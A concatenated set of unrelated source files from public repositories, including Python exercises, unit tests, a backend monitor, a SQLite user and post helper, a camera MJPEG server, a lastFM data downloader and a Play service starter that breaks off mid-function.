self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
with self.assertRaises(KeyError):
d['b']['c']
| 3.28125 | 3 |
Mundo 3/ex086.py | erickeloi/ExerciciosTreino | 0 | 12773216 | <reponame>erickeloi/ExerciciosTreino
# Exercício Python 086:
# Crie um programa que declare uma matriz de dimensão 3x3 e preencha com valores lidos pelo teclado.
# No final, mostre a matriz na tela, com a formatação correta.
matriz = list()
for contador in range(0, 10):
if 1 <= contador <= 3:
valor = int(input(f"Digite o valor da elemento [1, {contador}]: "))
matriz.append(valor)
elif 4 <= contador <= 6:
valor = int(input(f"Digite o valor da elemento [2, {contador-3}]: "))
matriz.append(valor)
elif 7 <= contador <= 9:
valor = int(input(f"Digite o valor da elemento [3, {contador-6}]: "))
matriz.append(valor)
print()
print("Gerando Matriz..")
print()
print(f'''[{matriz[0]}] [{matriz[1]}] [{matriz[2]}]\n[{matriz[3]}] [{matriz[4]}] [{matriz[5]}]\n[{matriz[6]}] [{matriz[7]}] [{matriz[8]}]''')
| 4.4375 | 4 |
tests/list_view.py | Aloxaf/moshmosh | 114 | 12773217 | <gh_stars>100-1000
from moshmosh.extensions.pattern_matching.runtime import ListView
v = ListView([1, 2, 3, 5], range(1, 4))
v.sort(reverse=True)
assert v == [5, 3, 2]
v.sort(reverse=False)
assert v == [2, 3, 5]
v.sort(reverse=False, key=lambda x: -x)
assert v == [5, 3, 2]
assert isinstance(v, list) | 2.234375 | 2 |
fish-finder/bin/test-statistics.py | MRSD2018/reefbot-1 | 0 | 12773218 | from FishFinder import *
from numpy import *
import sys
if __name__=="__main__":
dist = Statistics()
print dist.mean()
print dist.variance()
print dist.standard_deviation()
num_samples = int(sys.argv[1])
s = random.normal(0,0.1,num_samples)
dist.update(num_samples,sum(s),sum(s**2.))
print dist.mean()
print dist.variance()
print dist.standard_deviation()
| 2.328125 | 2 |
Module01/AdvFunctions/DictParams2.py | fenglihanxiao/Python | 0 | 12773219 | <gh_stars>0
"""
1. **kwargs usage
"""
def test(**kwargs):
# Do not use **kwargs
# Print key serials
print(*kwargs)
_dict = kwargs
for k in _dict.keys():
print("Key=", k)
print("Value=", _dict[k])
print()
test(a=1, b=2, c=3)
"""
1. * -> unpack container type
"""
list1 = [1, 2, 3]
tuple1 = (3, 4, 5)
set1 = {5, 6, 7}
dict1= {"aa": 123, "bb": 456, "cc": 789}
str1 = "itcast"
print(*list1)
def test2():
return 3, 4, 5
# uppack container
a, b, c = test2() | 3.203125 | 3 |
main_processes/backend_monitor/main.py | microsoft/nxs | 5 | 12773220 | import time
from typing import Any, Dict, List
from configs import GLOBAL_QUEUE_NAMES
from nxs_libs.queue import NxsQueueType
from nxs_libs.simple_key_value_db import NxsSimpleKeyValueDbType
from nxs_types.log import NxsBackendCmodelThroughputLog, NxsBackendThroughputLog
from nxs_types.nxs_args import NxsBackendMonitorArgs
from nxs_utils.nxs_helper import (
create_queue_puller_from_args,
create_queue_pusher_from_args,
create_simple_key_value_db_from_args,
)
class NxsBasicBackendMonitor:
def __init__(self, args: NxsBackendMonitorArgs) -> None:
self.args = args
self.model_expiration_secs = 30
self.logs_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.BACKEND_LOGS
)
self.logs_puller.set_buf_size(999)
self.kv_store = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
self.logs_dict: Dict[str, Any] = {}
self.logs_ts_dict: Dict[str, float] = {}
def _process_logs(self, logs: List[NxsBackendThroughputLog]):
ts = time.time()
keys_to_remove = []
for key in self.logs_dict:
if ts - self.logs_ts_dict[key] > self.model_expiration_secs:
keys_to_remove.append(key)
for key in keys_to_remove:
self.logs_dict.pop(key)
self.logs_ts_dict.pop(key)
for log in logs:
key = log.backend_name
self.logs_dict[key] = log
self.logs_ts_dict[key] = ts
def _get_stored_logs(self) -> List[NxsBackendThroughputLog]:
logs: List[NxsBackendThroughputLog] = []
for key in self.logs_dict:
logs.append(self.logs_dict[key])
return logs
def run(self):
while True:
logs: List[NxsBackendThroughputLog] = self.logs_puller.pull()
self._process_logs(logs)
self.kv_store.set_value(
GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS, self._get_stored_logs()
)
time.sleep(self.args.polling_interval_secs)
if __name__ == "__main__":
from main_processes.backend_monitor.args import parse_args
args = parse_args()
monitor = NxsBasicBackendMonitor(args)
monitor.run()
| 1.929688 | 2 |
advanced_descriptors/__init__.py | penguinolog/advanced-descriptors | 2 | 12773221 | # Copyright 2017 - 2021 <NAME> aka penguinolog
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Advanced descriptors for special cases."""
# Local Implementation
from .advanced_property import AdvancedProperty
from .log_on_access import LogOnAccess
from .separate_class_method import SeparateClassMethod
__all__ = ("SeparateClassMethod", "AdvancedProperty", "LogOnAccess")
try:
# Local Implementation
from ._version import version as __version__
except ImportError:
pass
__author__ = "<NAME>"
__author_email__ = "<EMAIL>"
__maintainers__ = {
"<NAME>": "<EMAIL>",
"<NAME>": "<EMAIL>",
"<NAME>": "<EMAIL>",
}
__url__ = "https://github.com/python-useful-helpers/advanced-descriptors"
__description__ = "Advanced descriptors for special cases."
__license__ = "Apache License, Version 2.0"
| 1.953125 | 2 |
python/day11.py | davidlowryduda/AoC18 | 0 | 12773222 | <reponame>davidlowryduda/AoC18
#! /usr/bin/env python3
"""
Solve day 11
"""
from utils import input_lines
def power_level(x, y, serial=8):
"""
A nonsense sequence of steps described in the puzzle instructions.
"""
rackID = x + 10
level = rackID * y
level += serial
level *= rackID
level = (level // 100) % 10
level -= 5
return level
def compute_power_levels(serial):
"""
Create a grid where grid[(x,y)] has the power_level at position (x,y).
"""
grid = dict()
for x in range(1, 301):
for y in range(1, 301):
grid[(x, y)] = power_level(x, y, serial=serial)
return grid
def compute_sized_powerlevel(grid, x, y, size=3):
"""
Compute combined powerlevel for sizexsize grid with topleft element (x,y).
"""
total_power_level = 0
for i in range(size):
for j in range(size):
total_power_level += grid[(x+i, y+j)]
return total_power_level
def find_largest_trio(grid):
"""
Find the largest 3x3 grid value.
"""
record = 0
record_tuple = (0,0)
for x in range(1, 298):
for y in range(1, 298):
candidate_power = compute_sized_powerlevel(grid, x, y)
if candidate_power > record:
record = candidate_power
record_tuple = (x, y)
return record, record_tuple
def find_largest_anysize(grid):
"""
Find the largest sizexsize grid value.
"""
record = 0
record_tuple = (0, 0, 0)
for x in range(1, 298):
print("On x =", x)
for y in range(1, 298):
maxsize = min(300-x, 300-y)
cand_record, cand_tuple = find_largest_anysize_at_xy(grid, x, y)
if cand_record > record:
record = cand_record
record_tuple = cand_tuple
return record, record_tuple
def find_largest_anysize_at_xy(grid, x, y):
"""
Finds the largest sizexsize grid with top-left location (x,y).
"""
maxsize = min(300 - x, 300 - y)
record = grid[(x,y)]
record_tuple = (x, y, 1)
prevsize = record
for size in range(2, maxsize + 1):
cand = prevsize
for i in range(size):
cand += grid[(x+i, y+size-1)]
cand += grid[(x+size-1, y+i)]
cand -= grid[(x+size-1, y+size-1)]
prevsize = cand
if cand > record:
record = cand
record_tuple = (x, y, size)
return record, record_tuple
def do_part_1(day, test=False):
#TESTSERIAL = 18
#TESTSERIAL = 42
MYSERIAL = 5719
grid = compute_power_levels(MYSERIAL)
print(find_largest_trio(grid)[1])
return
def do_part_2(day, test=False):
#TESTSERIAL = 18
MYSERIAL = 5719
grid = compute_power_levels(MYSERIAL)
print(find_largest_anysize(grid))
return
if __name__ == "__main__":
do_part_1(11, test=False)
do_part_2(11, test=False)
| 4.09375 | 4 |
Test-Servers/client.py | Rajatkhatri7/OCR-Api | 0 | 12773223 | <reponame>Rajatkhatri7/OCR-Api<gh_stars>0
import requests
url = 'http://127.0.0.1:5000/v1/ocr'
my_img = {'file' : open('test.jpg' , 'rb')}
response = requests.post(url , files = my_img)
# response = requests.get(url)
print(response.json()) | 2.671875 | 3 |
db.py | ashwani1218/OpenMEMEs | 1 | 12773224 | <reponame>ashwani1218/OpenMEMEs
import sqlite3
DB_FILE = 'OpenMEMEs.db'
def createDB():
""" This function creates the necessary tables in the db.
UPDATE THIS WHEN YOU CREATE NEW TABLES
TABLES:
users -> This table has all the registered users.
posts -> This table contains all the posts posted by registered users.
Contains the foreign key of user.id.
"""
DATABASE = sqlite3.connect(DB_FILE)
cur=DATABASE.cursor()
#USERS TABLE
sql_command = """CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY,
name TEXT,
email TEXT,
password TEXT);"""
cur.execute(sql_command)
#POSTS TABLE
sql_command = """ CREATE TABLE IF NOT EXISTS posts (
id INTEGER PRIMARY KEY,
user_id INTEGER NOT NULL,
post TEXT,
post_image TEXT
)
"""
cur.execute(sql_command)
DATABASE.commit()
def insertUser(name,email):
"""
This method inserts user into the db when user does a Google Oauth login
"""
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT email FROM users WHERE email = ?", (email,))
row = cur.fetchone()
if not row:
cur.execute("INSERT into users (name, email) values (?,?)",(name,email))
con.commit()
def insertOnRegistration(name,email,password):
"""
This method inserts user into db when user registers.
Returns True if user is already registered, False otherwise.
"""
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT email FROM users WHERE email = ?", (email,))
row = cur.fetchone()
if not row:
cur.execute("INSERT into users (name, email,password) values (?,?,?)",(name,email,password))
con.commit()
return False
return True
def get_posts(posts=10):
'''
This method gets all the post up-to the given limit
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("select post,post_image,name FROM posts INNER JOIN users on posts.user_id=users.id ORDER BY posts.id DESC LIMIT ?", (posts,))
return cur.fetchall()
def new_post(userId,postText, image_path):
'''
This method inserts post into the db.
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
try:
cur.execute("Insert into posts (user_id,post,post_image) values (?,?,?)",(userId,postText,image_path))
con.commit()
return True
except:
return False
def getUserByEmail(email):
'''
This method finds user using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT * FROM users Where email=? ",(email,))
user = cur.fetchone()
return user
def getPasswordByEmail(email):
'''
This method finds user's password using email
Returns none if user doesn't exist
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT password FROM users Where email=? ",(email,))
password = cur.fetchone()
if password:
return password[0]
else:
return None
def getNameByEmail(email):
'''
This method finds user's name using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT name FROM users Where email=? ",(email,))
name = cur.fetchone()[0]
return name
def getIdByEmail(email):
'''
This method finds user's Id using email
'''
with sqlite3.connect(DB_FILE) as con:
cur = con.cursor()
cur.execute("SELECT id FROM users Where email=? ",(email,))
id = cur.fetchone()[0]
return id
| 3.765625 | 4 |
venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/tests/unit/plugins/filter/test_from_xml.py | usegalaxy-no/usegalaxy | 1 | 12773225 | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import unittest
from ansible.errors import AnsibleError
from ansible.errors import AnsibleFilterError
from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml
INVALID_DATA = '<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
VALID_DATA = (
'<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
"<schemas><schema/></schemas></netconf-state>"
)
OUTPUT = """{"netconf-state": \
{"@xmlns": "urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring", "schemas": {"schema": null}}}"""
class TestFromXml(unittest.TestCase):
def setUp(self):
pass
def test_invalid_data(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "xmltodict"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn(
"Error when using plugin 'from_xml': Input Xml is not valid",
str(error.exception),
)
def test_valid_data(self):
"""Check passing valid data as per criteria"""
self.maxDiff = None
args = ["", VALID_DATA, "xmltodict"]
result = _from_xml(*args)
self.assertEqual(result, OUTPUT)
def test_args(self):
"""Check passing invalid argspec"""
# missing required arguments
args = []
kwargs = {}
with self.assertRaises(AnsibleFilterError) as error:
_from_xml(*args, **kwargs)
self.assertIn("missing required arguments: data", str(error.exception))
def test_invalid_engine(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "test"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn("engine: test is not supported", str(error.exception))
| 2.125 | 2 |
openprocurement/auction/esco/tests/unit/constants.py | ProzorroUKR/openprocurement.auction.esco | 0 | 12773226 | # -*- coding: utf-8 -*-
AUCTIONS = {
'simple': 'openprocurement.auction.esco.auctions.simple',
'multilot': 'openprocurement.auction.esco.auctions.multilot',
}
| 0.972656 | 1 |
main.py | Lapland-UAS-Tequ/tequ-basler-app | 0 | 12773227 | import io
import json
import os
import sys
from http.server import ThreadingHTTPServer
from mjpegserver import StreamingHandler
from threading import Condition
from threading import Thread
import basler
from utility import ePrint
"""
FrameBuffer is a synchronized buffer which gets each frame and notifies to all waiting clients.
It implements write() method to be used
"""
class FrameBuffer:
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
# New frame
with self.condition:
# write to buffer
self.buffer.seek(0)
self.buffer.write(buf)
# crop buffer to exact size
self.buffer.truncate()
# save the frame
self.frame = self.buffer.getvalue()
# notify all other threads
self.condition.notify_all()
def main():
try:
ePrint(sys.argv)
camera_id = sys.argv[1]
port = int(sys.argv[2])
ePrint("Starting MJPEG Server for camera ID: %s @port %s" % (camera_id, port))
script_path = os.path.dirname(os.path.realpath(__file__))
config_path = script_path+'/'+'config.json'
config_file = open(config_path, "r")
config = json.load(config_file)
config_file.close()
# Create frame_buffer for image data sharing
frame_buffer = FrameBuffer()
# Start camera image grabbing
camera = basler.Basler(config[camera_id], camera_id, frame_buffer)
# Start camera command handler
thread1 = Thread(target=camera.cameraCommandHandler)
thread1.start()
# Start Datastreamer to StdOut
if config[camera_id]["converter"]["OutPutToStdOut"]:
from utility import DataStreamer
streamer = DataStreamer(frame_buffer)
thread2 = Thread(target=streamer.writeToStdout)
thread2.start()
# Start MJPEG server
address = ('', port)
httpd = ThreadingHTTPServer(address, lambda *args: StreamingHandler(frame_buffer, camera_id, *args))
httpd.serve_forever()
finally:
camera.stopGrabbingImages()
thread1.join()
if config["converter"]["OutPutToStdOut"]:
thread2.join()
ePrint("Threads finished...exiting")
ePrint("Program finished")
if __name__ == '__main__':
main()
| 2.984375 | 3 |
examples/optmod/dcopf/dcopf_api.py | Fuinn/mos-examples | 2 | 12773228 | <reponame>Fuinn/mos-examples
import os
import numpy as np
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
from mos.interface import Interface
# Interface
interface = Interface()
# Delete model
interface.delete_model_with_name('DCOPF Model')
# New model
model = interface.new_model('./examples/optmod/dcopf/dcopf_model.py')
# Existing model by name
model = interface.get_model_with_name('DCOPF Model')
# Set inputs
model.set_interface_file('case', './examples/optmod/dcopf/ieee14.m')
model.set_interface_object('feastol', 1.5e-3)
assert(model.get_name() == 'DCOPF Model')
assert(model.get_system() == 'optmod')
assert(model.get_status() == 'created')
# Initial types and shapes
t, s = model.get_variable_type_and_shape('P')
assert(t == 'unknown')
assert(s is None)
# Run
model.run()
# Status
assert(model.get_status() == 'success')
# Input file
f = model.get_interface_file('case')
ff = open(f, 'r')
ff.close()
os.remove(f)
# Input object
assert(model.get_interface_object('feastol') == 1.5e-3)
# Helper object
assert(model.get_helper_object('net')['base_power'] == 100)
# Variable
t, s = model.get_variable_type_and_shape('P')
assert(t == 'hashmap')
assert(isinstance(s, tuple))
assert(s == (5,))
P = model.get_variable_state('P', 'value')
assert(isinstance(P, dict))
assert(len(P) == 5)
for i in range(5):
assert(i in P)
# Function
gen_cost = model.get_function_state('gen_cost', 'value')
assert(isinstance(gen_cost, float))
assert(abs(gen_cost-7642) < 1)
# Constraint
pcb_vio = model.get_constraint_state('power_balance', 'violation')
assert(isinstance(pcb_vio, np.ndarray))
assert(pcb_vio.shape == (14,))
assert(pcb_vio.dtype == float)
assert(np.max(np.abs(pcb_vio)) < 1e-10)
# Solver state
s = model.get_solver_state()
assert(isinstance(s, dict))
assert(s['status'] == 'solved')
# Problem state
s = model.get_problem_state()
assert(isinstance(s, dict))
# Output file
f = model.get_interface_file('output')
ff = open(f, 'r')
ff.close()
os.remove(f)
# Output object
o = model.get_interface_object('output_obj')
assert(isinstance(o, list))
assert(len(o) == 4)
# Execution log
assert(isinstance(model.get_execution_log(), str))
assert(len(model.get_execution_log()) > 0)
| 2.328125 | 2 |
Aulas/aula_2_-_uniform_filter/aula_2.py | ronaldosena/imagens-medicas-2 | 4 | 12773229 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: <NAME>
# Contact: <EMAIL>
# Git: www.github.com/italogfernandes
# This project is based on: https://github.com/ronaldosena/imagens-medicas-2
# Please give the credits to ronaldo sena.
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# ------------------------------------------------------------------------------
from scipy.misc import imread
import matplotlib.image as mpimg
import scipy.ndimage as ndimage
from matlab_fspecial import fspecial
# First part
files_folder = '../../datasets/' # Caminho para a pasta onde estao as imagens
file_names = ('arteriaBMP.bmp','blood0.PNG','blood1.PNG','pe.jpg')
in_images = [imread(files_folder+image_name) for image_name in file_names ]
out_images = [None] * len(file_names)
brightness = 100
mask_sizes = (3,7,25)
kernels = []
for mask_size in mask_sizes:
kernels.append(fspecial('average',mask_size))
# for in_image in in_images:
for i in range(len(file_names)):
in_image = in_images[i]
o1 = in_image + brightness
o1[in_image > (255 - brightness)] = 255
o2 = in_image - brightness
o2[in_image < (0 + brightness)] = 0
out_images[i] = [o1, o2]
plt.figure()
plt.subplot(2,len(mask_sizes)+1,1)
plt.imshow(in_image, cmap=plt.cm.gray)
plt.title('Original')
plt.subplot(2,len(mask_sizes)+1,len(mask_sizes)+2)
plt.hist(in_image.ravel(),256,[0,256])
plt.title('Histograma original')
out_images_line = []
for j in range(len(mask_sizes)):
out_image = ndimage.uniform_filter(in_image,size=mask_sizes[j])
#out_image = ndimage.correlate(in_image,kernels[j])
out_images_line.append(out_image)
plt.subplot(2, len(mask_sizes)+1, j+2)
plt.imshow(out_image, cmap=plt.cm.gray)
plt.title('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
plt.subplot(2, len(mask_sizes)+1,j+len(mask_sizes)+3)
plt.hist(out_image.ravel(),256,[0,256])
plt.title('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
out_images.append(out_images_line)
plt.show()
| 2.171875 | 2 |
tests/benchmark/pylot_benchmark_test.py | yujialuo/erdos | 0 | 12773230 | <gh_stars>0
import os
import sys
from absl import app
from absl import flags
sys.path.append(
os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
from examples.benchmarks.pylot.camera_operator import CameraOperator
from examples.benchmarks.pylot.lidar_operator import LidarOperator
from examples.benchmarks.pylot.detection_operator import DetectionOperator
from examples.benchmarks.pylot.segmentation_operator import SegmentationOperator
from examples.benchmarks.pylot.slam_operator import SLAMOperator
from examples.benchmarks.pylot.tracker_operator import TrackerOperator
import erdos.graph
FLAGS = flags.FLAGS
flags.DEFINE_string('framework', 'ros',
'Execution framework to use: ros | ray.')
def main(argv):
# Set up graph
graph = erdos.graph.get_current_graph()
# Add operators
camera = graph.add(
CameraOperator, name='camera', setup_args={'op_name': 'camera'})
detector = graph.add(
DetectionOperator,
name='detector',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100,
'min_det_objs': 3,
'max_det_objs': 15
},
setup_args={'op_name': 'detector'})
lidar = graph.add(
LidarOperator,
name='lidar',
init_args={'num_points': 100000},
setup_args={'op_name': 'lidar'})
tracker = graph.add(
TrackerOperator,
name='tracker',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
},
setup_args={'op_name': 'tracker'})
segmentation = graph.add(
SegmentationOperator,
name='seg',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
},
setup_args={'op_name': 'seg'})
slam = graph.add(
SLAMOperator,
name='SLAM',
init_args={
'min_runtime_us': 1,
'max_runtime_us': 100
})
# Connect operators
graph.connect([camera], [detector, segmentation])
graph.connect([camera, detector], [tracker])
graph.connect([lidar, tracker], [slam])
# Execute graph
graph.execute(FLAGS.framework)
if __name__ == '__main__':
app.run(main)
| 2.078125 | 2 |
backend/apps/volontulo/tests/views/api/offers/test_delete.py | magul/volontulo | 16 | 12773231 | <gh_stars>10-100
"""
.. module:: test_delete
"""
from rest_framework import status
from rest_framework.test import APITestCase
from apps.volontulo.factories import OfferFactory
from apps.volontulo.factories import OrganizationFactory
from apps.volontulo.factories import UserFactory
class TestAdminUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for admin user."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.client.force_login(UserFactory(
userprofile__is_administrator=True
))
def test_offer_delete_status(self):
"""Test offer's delete status for admin user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestOrganizationUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for user with organization."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.organization = OrganizationFactory()
self.client.force_login(UserFactory(
userprofile__organizations=[self.organization]
))
def test_offer_delete_status(self):
"""Test offer's delete status for user with organization.
API for now is read-only.
"""
offer = OfferFactory(organization=self.organization)
response = self.client.delete(
'/api/offers/{}/'.format(offer.id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestRegularUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for regular user."""
def setUp(self):
"""Set up each test."""
super().setUp()
self.client.force_login(UserFactory())
def test_offer_delete_status(self):
"""Test offer's delete status for regular user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TestAnonymousUserOffersDeleteAPIView(APITestCase):
"""Tests for REST API's delete offer view for anonymous user."""
def test_offer_delete_status(self):
"""Test offer's delete status for anonymous user.
API for now is read-only.
"""
response = self.client.delete(
'/api/offers/{}/'.format(OfferFactory().id)
)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| 2.015625 | 2 |
download.py | delannoy/lastfm-explorer | 0 | 12773232 | #!/usr/bin/env python3
'''
Export lastFM data as JSON files and merge them into a flat pandas.DataFrame.
'''
from __future__ import annotations # [PEP 563 -- Postponed Evaluation of Annotations](https://www.python.org/dev/peps/pep-0563/)
from apiWrapper import Param, getReq
from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV
import logFormat
import datetime, enlighten, json, logging, math, time
def downloadData(param:Param, download:bool=True):
'''Download user data (if {download} is True) to json files, merge them into a flat pandas.DataFrame, and write it to disk.'''
logging.info(f"{param.filePath().name.replace('.','|')}")
if download:
subMethod = param.splitMethod(lower=True)
for f in param.filePath(glob='*json'): f.unlink()
pbarManager = enlighten.get_manager()
with pbarManager.counter(unit='page', leave=False) as pbar:
while param.page <= param.nPages:
fileName = param.filePath(ext=f'.{param.page:04d}.json')
response = getReq(param=param, pbarManager=pbarManager, collapse=False)
param.page = int(response.get(subMethod).get('@attr').get('page'))
param.nPages = int(response.get(subMethod).get('@attr').get('totalPages'))
pbar.total = param.nPages # [tqdm: update total without resetting time elapsed](https://stackoverflow.com/a/58961015/13019084)
pbar.update()
param.filePath().parent.mkdir(exist_ok=True)
with open(file=fileName, mode='w') as jsonF: json.dump(obj=response, fp=jsonF)
param.page += 1
time.sleep(param.sleep)
pbarManager.stop()
DF = loadJSON(param)
df = flattenDF(param=param, DF=DF, writeToDisk=True)
if param.splitMethod() in ['TopArtists','TopAlbums','TopTracks']: writeCSV(param=param, df=df)
def exportScrobbles():
'''Fetch and process user scrobbles for the current year and for any year where exported json files are not present.'''
def earliestScrobbleYear() -> int:
'''Determine the earliest year for the user's scrobbles.'''
lastPage = int(getReq(param=Param(method='user.getInfo')).get('playcount')) - 100 # subtract 100 plays, in case some have "unknown" scrobble dates, i.e. 1970
return getReq(param=Param(method='user.getRecentTracks', lim=1, page=lastPage)).loc[0,'date'].year
param = Param(method='user.getRecentTracks', period='overall')
currentYear = datetime.datetime.now().year
for year in range(earliestScrobbleYear(), currentYear):
paramYear = Param(method='user.getRecentTracks', period=year, fr=f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')
response = getReq(param=paramYear, collapse=False, limit=1)
numPages = math.ceil(int(response.get('recenttracks').get('@attr').get('total'))/param.lim)
if numPages != len(paramYear.filePath(glob='*json')): downloadData(paramYear, download=True)
else: downloadData(paramYear, download=False)
downloadData(Param(method='user.getRecentTracks', period=currentYear, fr=f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59'))
mergeRecentTracks(param)
def main():
# downloadData(Param(method='user.getTopTracks', period='overall'))
downloadData(Param(method='user.getTopAlbums', period='overall'))
downloadData(Param(method='user.getTopArtists', period='overall'))
exportScrobbles()
if __name__== "__main__":
main()
| 2.6875 | 3 |
servicemanager/service/smplayservice.py | alphagov/service-manager | 0 | 12773233 | <reponame>alphagov/service-manager
#!/usr/bin/env python
import os
import shutil
import zipfile
import stat
import copy
import types
from servicemanager.subprocess import Popen
from ..service.smservice import SmMicroServiceStarter
from smjvmservice import SmJvmService, SmJvmServiceStarter
from ..smfile import force_chdir, force_pushdir, remove_if_exists, remove_folder_if_exists, makedirs_if_not_exists
from ..smnexus import SmNexus
from ..actions.colours import BColors
from servicemanager import subprocess
b = BColors()
class SmPlayServiceStarter(SmJvmServiceStarter):
PLAY_PROCESS_STARTUP_TIMEOUT_SECONDS = 120
def __init__(self, context, service_name, run_from, port, classifier, service_mapping_ports, version, proxy, append_args):
SmMicroServiceStarter.__init__(self, context, service_name, "play", run_from, port, classifier, service_mapping_ports, version, proxy, append_args)
if not self.port:
self.port = self.service_data["defaultPort"]
def _build_extra_params(self):
extra_params = ["-Dhttp.port=%d" % self.port]
extra_params += self.process_arguments()
# Features are so specific - should this be in config?
if self.context.features:
for feature in self.context.features:
extra_params += ["-Dfeature.%s=true" % feature]
service_config_key = "Dev.microservice.services"
if self.context.is_test:
if self.service_data.get("hasMongo", False):
extra_params += ["-DDev.microservice.mongodb.uri=mongodb://localhost:27017/%s-%s" % (self.context.database_name_prefix, self.service_name)]
if self.service_mapping_ports and self.service_data.get("hasServiceMappings", False):
for dependent_service_name in self.service_mapping_ports:
service_config_key_with_prefix = service_config_key
if self.service_name == "FEGOVUK":
service_config_key_with_prefix = "govuk-tax.Dev.services"
extra_params += [
"-D%s.%s.host=localhost" % (service_config_key_with_prefix, dependent_service_name),
"-D%s.%s.port=%d" % (service_config_key_with_prefix, dependent_service_name, self.service_mapping_ports[dependent_service_name])
]
if self.proxy:
proxy_config = self.proxy.split(":")
print "Starting service with proxy, '" + str(self.proxy) + "'"
extra_params += [
"-Dhttp.proxyHost=" + proxy_config[0],
"-Dhttp.proxyPort=" + proxy_config[1]
]
if self.append_args:
if not isinstance(self.append_args, types.ListType):
self.log("WARNING: I was passed a non list for append args of '" + str(self.append_args) + "' I dont know what to do with this")
else:
extra_params += self.append_args
return extra_params
def supports_append_args(self):
return True
def get_start_command(self, run_from):
if run_from == "SOURCE":
source_cmd = copy.copy(self.service_data["sources"]["cmd"])
source_cmd[-1] = source_cmd[-1] + " " + " ".join(self.sbt_extra_params())
return source_cmd
else:
return self.service_data["binary"]["cmd"] + self._build_extra_params()
def start_from_binary(self):
microservice_target_path = self.context.get_microservice_target_path(self.service_name)
force_chdir(microservice_target_path)
if not self.context.offline:
nexus = SmNexus(self.context, self.service_name)
if not self.version:
self.version = nexus.find_latest_version(self.run_from, self.service_data["binary"]["artifact"])
nexus.download_jar_if_necessary(self.run_from, self.version)
unzip_dir = self._unzip_play_application()
parent, _ = os.path.split(unzip_dir)
force_pushdir(parent)
cmd_with_params = self.get_start_command("BINARY")
if os.path.exists(cmd_with_params[0]):
os.chmod(cmd_with_params[0], stat.S_IRWXU)
else:
print b.fail + "ERROR: unable to chmod on non existent file '" + parent + cmd_with_params[0] + "'" + b.endc
makedirs_if_not_exists("logs")
print(cmd_with_params)
with open("logs/stdout.txt", "wb") as out, open("logs/stderr.txt", "wb") as err:
popen_output = Popen(cmd_with_params, env=os.environ.copy(), stdout=out, stderr=err, close_fds=True)
if popen_output.returncode == 1:
print b.fail + "ERROR: could not start '" + self.service_name + "' " + b.endc
return popen_output.pid
def _unzip_play_application(self):
service_data = self.service_data
microservice_zip_path = self.context.application.workspace + service_data["location"] + "/target/"
force_pushdir(microservice_zip_path)
zip_filename = service_data["binary"]["artifact"] + ".zip"
unzipped_dir = SmPlayService.unzipped_dir_path(self.context, service_data["location"])
